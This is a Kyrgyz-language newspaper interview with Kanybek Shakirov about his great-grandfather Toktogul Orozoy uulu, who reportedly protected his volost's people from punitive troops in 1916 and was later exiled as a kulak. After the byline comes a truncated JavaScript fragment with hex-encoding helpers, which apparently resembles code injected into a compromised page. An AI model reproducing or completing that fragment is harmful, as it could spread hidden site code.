Каныбек ШАКИРОВ, КР ЖКнын Мыйзамдарды эсепке алуу жана тутумдаштыруу бөлүмүнүн башчысынын орун басары: “Токтогул бабам 5-6 миӊ адамды кыргындан сактап калган”

 

5-Токтогул баба

Улуттук боштондук көтөрүлүштүн негизинде келип чыккан Үркүн окуясы элибиздин тарыхында чоӊ жоготуу жана сабак катары сакталып калды. Орус империясынын жазалоочу аскерлери тарабынан далай айыл чабылып, кан төгүлүп турган маалда Кыдыр аке кыраакылыгы менен Ак-Суунун элин аман сактап калганы тууралуу айтылып келет. Мындай келечектүү ойлоно билген, кыйын кырдаал, кыйчалышта жол таап элин азап менен кыргындан сактап калган кадырман кишилердин катарын ошол кездеги Жумгалдын Мырзабек болуштугунун катчы-кеӊешчиси, саяктын шаа-бото уругунан чыккан Токтогул Орозой уулу да толуктайт. Ата жолун улап келаткан анын чөбөрөсү, Кыргыз Республикасынын Жогорку Кеӊешинин Мыйзамдарды эсепке алуу жана тутумдаштыруу бөлүмүнүн башчысынын орун басары Шакиров Каныбек Кадырович менен маектешип, бабасынын өрнөктүү өмүрү тууралуу пикир алдык.

5-Шакиров

– Каныбек мырза, ушул күнгө чейин бабаӊыз тууралуу окуу китептеринен, башка маалымат булактарынан кабардар болгон эмес элек. Ошондуктан, алгач бабаӊыз жөнүндө учкай айтып өткөнүӊүз дурус болоор?

– Бабам, Токтогул Орозой уулу болжол менен 1865-1875-ж.ж. Кара-Кече жайлоосунда жарыкка келген. Бубам көрүнүктүү жыгач уста болуп, үй-бүйлөсү орто бай турган экен. Орозойдун Пишпекте татар достору болуптур. Ал кезде татарлар илим-билимдүү келип, элдин кат-сабатын жоюунун үстүндө эмгектенип, математика, физика, география, тарых сыяктуу сабактарды элге окутушкан дешет. Бубам Токтогул бабамды Пишпекте татар медреседе окутат. Окуусун бүтүргөндөн кийин Жумгалга барып, Мырзабек болуштун кеӊешчиси жана жазуучу-катчысы катары эмгектенип калат. Ал кезде Жумгал өрөөнү Чойбек жана Мырзабек болуштугунан турган. Билимдүү киши катары бабам эки болуштукка бирдей кызмат кылган. Болуштун сыйына татыган Токтогул бабамдын  айткан сөзү чечимге негиз болчу экен. Туура эмес маселе болгондо бабам унчукпай гана койчу экен. Ал адамдарга боорукерлик жана мээрим менен мамиле кылчу деп айтылат. Сырттан келген жетим-жесирлерге өзүнүн айылынан баш калка берип, өз чөлкөмүнө кошуп алчу экен. Ал кезде ошол жердеги маселелерге жетекчилер жооп берген. Эскерүүлөргө караганда, Токтогул бабам Анжиянга барганда жергиликтүү элге зарыл болгон каражаттарды ала келип турчу экен. Алгачкылардан болуп аймакка мырза теректерди алып келип тиктирген, топурактан үй салдырып, отурукташтырууну да жолго коюу демилгесин көтөрүп чыккан, биринчилерден болуп болуштукка дүкөн ачтырып, элдин жаңы багытта өсүп-өнүгүшүнө алгачкылардан болуп кадам таштаган ушул бабам болуптур. Жаратылышка жана адамдарга өзгөчө кам көргөн бабам адамгерчиликтүүлүгү менен айырмаланып, бай-кедейине  карабай баарына теӊ карачу дешет. Улуулар, Токомдой адам болобу, эгер ал кишини жамандасак, анда анын тузу уруп кетет деп айтып калышчу.

Анын адамдык сапатына дагы кошумчалап айта кете турган нерсе, ал март киши болуп, байлыктын артынан түшпөй, ток пейил мүнөздөгү адам экен. Муну, ошол учурдагы абдан белгилүү Тайкашка деген күлүгү Меркедеги чоӊ ашта (Чоӊ Чоӊконун ашында делет) биринчи келип, байгесине алынган 1000 койду толугу менен ошол аймактагы муктаж адамдарга бөлдүрүп бергени тарыхтан тастыкталат. Токтогул бабам адамгерчиликтин, көрөгөчтүктүн, дипломатиялыктын, билимдүүлүктүн, кыраакылыктын жана даанышмандыктын үлгүсү болгонуна бизге жеткен маалымат-баяндар жетиштүү далил.

– Болуштуктагы элин кыргындан аман сактап калгандыгы Токтогул Орозой уулунун эӊ негизги эрдиги катары бааланса керек?

– Туура. 1916-жыдагы кыргыз элинин башына түшкөн катаал жана сыноочу учурда бабам болуштун кеӊешчи, жардамчысы болуп турган экен. Эл үркүп, кыргын башталып калган кез. Окуянын алдында Жумгалдын Аралында Көкөмерен суусунун көлөмүн өлчөп турган орус жашачу экен. Эл аны “суу-төрө” деп коюшчу дешет. Орус тилин билген киши катары бабам ал киши менен байланышып калчу экен. Бир күнү кырдаалга кыжырданып турган кишилерби же каракчыларбы, “суу-төрөнү” катуу уур-токмокко алып, дээрлик өлдү делген абалга калтырып таштап кетишет. Кызынын кайрылуусунан улам Токтогул бабам өзүнүн жанынан үй тиктирип, орусту көчүрүп келет. Аны өзүнүн Макей деген бир тууган иниси дарылап, айыктырып, абалын жакшыртып сактап калат. Башы чоӊ жарылгандан улам, аны жергиликтүүлөр  ошондон кийин жарык баш деп атап калышат. “Суу-төрөнү”  бир нече убакытка бабам багат. Кийин жазалоочу аскерлер жакындап, Чойбек болуштугундагы эл үркө баштаган кез келет. Орус аскерлери Мырзабек болуштугуна жеткени калыптыр деген кезде, Мырзабек болуш Токтогулга келет дагы, “Токо, элдин башы үркүп калды, элди бөөдө кырып алабыз. Камынып, биз да кетели” деп, кеӊеш сурайт. Ошондо Токтогул, “Биз бул жактан качып Кытайга бара турган болсок, ал жактагы кытай биздин чекебизден сылап, алдыбызга аш, үстүбүзгө үй тургузуп бербейт. Жолдо да кыргынга учурайбыз. Орустар дагы адам, алардын да тилин тапса болот, менде “документ бар” деп, баягы орусту мисал кылат.

Жазалоочу аскерлер Суусамырдын Арал тарабынан жана Кочкор тараптан кысып киришкен убак. Аскерлери Арал тараптан кирип келген кезде атабыз ак желегин карманып, баягы “жарык башты” кызы менен жанына алып, аскерлердин алдынан тосуп чыгат. Аман калган “суу-төрө” ортодо өз сөзүн айтып, жергиликтүү тургундар аны асырап калгандыгын маалымдап, болуштун элинин орус падышачылыгына көз-карашы түз деген пикирин билдирет. Токтогул атабыз да алар менен сүйлөшүп, аскерлердин элди зыянга учуратпоосуна макулдук алат. Аскерлер коопсуздук үчүн үйлөрдү бир ирет текшерип алып, элге эч зыян кылбастан кетишет. Бул окуяда Токтогул бабам болжол менен болуштуктун 1000 түтүн же 5-6 миӊдей элин кыргындан, азаптан сактап калган экен.

– Бабаӊыздын кийинки тагдыры эмне болгон?

– Акырындык менен совет бийлиги орноп, “кулакка” тартуу күч ала баштаган маалда бай, манап, бийлердин мал-мүлкүн мамлекет каратып алып, өздөрүн куугунтуктап, көбүн сүргүнгө айдай башташат. Бай-манап катары бабам да айыпталып, өз эрки менен мамлекетке мал-мүлкүн өткөрүп берип, өзү жер которуп кетейин деп камынып жүрүп, Кочкордо досторунун үйүндө коноктоп туруп калат. Тамак үстүндө отурганда жергиликтүү бир байды кулакка тартуу үчүн “кызыл чоктор” келип калышат. Досун кулакка тартып, үйдөгүлөрдүн баарын суракка алган кезде бабам мен дагы манапмын, демек мен дагы кулакмын деп жооп берет. Абийири, намысы аны досторунун жанында кулак эмесмин, жөн гана конокмун деген сөздү  айттырган эмес. Ошентип, бабамды да кулактарга кошуп, төрт жаштагы  Капар, эки жаштагы  Шакир (менин чоң атам), анан эмчектеги Насыр деген баласы менен аялын бирге алып барып бир сарайга камашат. Кулактарды алыска айдап кетет дегенди уккандан кийин Токтогул бабам биздин тукум улансын деп бирөөлөрдү чакыртат дагы, төрт жаштагы жана эки жаштагы баласын элге аманат кылып, короонун тешигинен качырып чыгарган экен. Чоӊ атам ошол окуяны “бир чоӊ киши келип экөөбүздү эки колуна кармап алып, бутубузду жерге тийип-тийгизбей сүйрөп алып качып жөнөдү. Анан ат арабалар келип аталарыбызды салып кетишти. Кетип аткандагы ый, ызы-чуу, коштошуу кыйкырыктары күнү бүгүнкүгө чейин эсимде” деп айтып берээр эле. Ошентип, бабам Ташкент аркылуу Украинага айдалып кетиптир. Ал жакта картошка талаада иштеп жүрүшчү, кийин тиф оруусу каптап, ошондон кайтыш болгон делет. Андан соӊ эмне болгону белгисиз бойдон калды. Токтогул бабамдын өмүр-таржымалын тереӊ изилдеп, тагдырын аныктоо иши тарыхчыларга, окумуштууларга коюлат. Анткени, бабам жана окуялар тууралуу аскерлердин жогору жакка билдирүүсү архивдик материалдарда сакталып калса керек. Бул биринчи кезекте бийликтегилердин сабак алуусу керек болгон окуя. Анткени, элди азап-тозоктон аман сактап калуу үчүн башчылар келечекти көрө билип, акылды, зарыл кезде амалды дагы колдонуш керек.

– Сиздин оюңузча, биз Үркүндөн кандай сабак ала алабыз?

– Үркүнгө тарыхчы жана окумуштуулар өз бааларын берип жатышат. Менимче, үркүндү бир жактуу гана  карап, баа берүү туура эмес болуп калса керек. Анткени, ал кездеги шарт, эки элдин жетишкендиктери, социалдык, саясий, экономикалык, аскерий ж.б. абалы бирдей эмес болгон. Үркүндүн келип чыгышынын башкы себептери катары эки тараптуу түшүнбөөчүлүк жана келишпестикти бааласак болот. Негизинен падышанын жергиликтүү ишке жарактуу эркектерди орукка тартуу тууралуу жобосу көтөрүлүшкө себепкер болгону айтылып жүрөт. Бирок, ага чейин деле айрым энөөлөрдүн айынан жергиликтүү орустар тарабынан империялык жетекчиликке доо-арыздар көп түшө берген. Империя катары орус аскерлери күчтүү болгон, бирок биздин ички ынтымагыбыз бекем эмес эле. Калктын калыӊ катмары ага чейинки ички жана сырткы согуш, чапкындардан моралдык жактан чарчап, деми сууп турган. Билгилерибиз бир башка бириге албай, жалыныбызды жандыра албай, демибизди арттыра албай, акылдуу ак сөөктөрүбүздү ардактай албай алдастап турган маалыбыз үчүн эч кимди күнөөлөй албайбыз. Үркүн окуясы эркиндикти сүйгөн элибиздин башына түшкөн ири жоготуулар менен коштолгон тарых катары калды. Бүгүнкү күндө мындай катаал окуя элибизде кайталанбасын үчүн жана элибиз басып өткөн кыйын кырдаалдарды унутпоо үчүн үркүндөн сабак алып туруубуз кажет. Ал сабак, күнөөнү башкадан издебегиле, өткөнүӊөрдү унутпагыла, социалдык теӊдикти сактагыла, улуттар аралык ынтымакты жана ички биримдигиӊерди арттыргыла, бир башка биригип, билгилериӊерди сыйлагыла, билгилер болсо кыраакы болуп, ырааккыны көрө билсин, демиӊер бийик, эл-жериӊер ыйык болсун деген чакырыкты туюнтат.

Элибиз кеменгер, кечиримдүү эл. Эки тараптуу катачылыктарды эске алуу менен кек болсо кечирип, кыжырлануу жаратпай, кылым өткөн окуяны эстен чыгарбастан эртеӊибизге сабак алып жашаганыбыз жакшы жыйынтык берет. Тарыхыбыздын жаӊы барактары орус эли менен бирге жазылып калды. Учурда дагы, келечекте дагы тагдырлаш болобуз. Ошондуктан, биримдикти арттырууга аракет кылышыбыз керек деп эсептейм.

– Токтогулдай кишинин чөбөрөсү болуу сизге эмне берет?

– Кыргызда жети атаны билүү – өзөктү кармоо, бекемдөө, касиетти таануу үчүн керек. Текти билгендин күч-кубаты артат. Элге-жерге берилүүсү күчтөнөт. Мен ушундай улуу адамдын урпагы экендигиме абдан сыймыктанам. Тегимди сөзгө калтырбоо үчүн дайыма өзүмдү өстүрүүгө умтулуп, адамдык асыл сапаттарымды арттырууну күн сайын тиленем жана ага аракет кылам. Эл-жериме бабамдай кызмат кылсам деп эмгектенем.

– Маегиңиз үчүн чоң ырахмат!

Чолпонбек КАПАРБЕК уулу

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *